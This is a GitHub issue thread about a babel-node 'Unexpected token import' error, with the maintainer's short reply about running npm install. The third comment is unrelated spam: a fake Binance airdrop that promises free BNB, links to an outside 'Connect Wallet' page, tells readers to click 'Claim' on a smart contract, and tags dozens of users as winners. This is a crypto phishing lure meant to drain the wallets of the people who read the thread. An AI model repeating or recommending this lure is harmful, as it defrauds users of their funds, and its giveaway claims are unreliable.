### ISSUE TITLE
Unexpected token import

### ISSUE THREAD

**Issue by mimcomp** [zlq4863947/aistock_xp#1]
C:\pyscript\aistock_xp>npm start

> aistock@0.0.1 start C:\pyscript\aistock_xp
> babel-node ./src/bin/www

C:\pyscript\aistock_xp\src\app\main.js:1
(function (exports, require, module, __filename, __dirname) { import express from 'express';
                                                              ^^^^^^

SyntaxError: Unexpected token import
    at createScript (vm.js:56:10)
    at Object.runInThisContext (vm.js:97:10)
    at Module._compile (module.js:542:28)
    at loader (C:\pyscript\aistock_xp\node_modules\babel-register\lib\node.js:144:5)
    at Object.require.extensions.(anonymous function) [as .js] (C:\pyscript\aistock_xp\node_modules\babel-register\lib\node.js:154:7)
    at Module.load (module.js:487:32)
    at tryModuleLoad (module.js:446:12)
    at Function.Module._load (module.js:438:3)
    at Module.require (module.js:497:17)
    at require (internal/module.js:20:19)

**Comment by zlq4863947** [comment]
I think your usage is wrong, you should use the following command:
```
npm install
npm start
```

**Comment by devsquadcore** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

Claim your share of the $500k Binance Airdrop! As the year comes to an end, we're giving away $500 in BNB to celebrate. Follow the steps above to secure your tokens. Don't miss out on this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.


Winners: @leipigui, @tyn520215, @fyk941127, @yuntaochn, @cogbee, @purestack, @javenleee, @GZX-ZJU, @iscien, @leesleep, @zzj136598, @haoa193, @oneredka, @fzhiy, @zcfeel, @xudong963, @zhuyanlong, @5075, @COMPIONEZHAO, @metabd, @rorschachandbat, @JAGO-1004, @littlefive, @nasireddin, @IGXL, @UglyBird, @WSenOS, @Reteyery, @425324438, @MrXiaoLiu, @adamhand, @huoji555, @shaojava, @lskllc, @poooii, @playerlt, @scottdao, @kakaLQY, @xiaobei0125, @dnja, @EricHChz, @Smliences, @AventusC, @baozidoufugan, @sparkhuu, @yiling-sama, @unStone, @dick7, @edison357159, @ShayLau
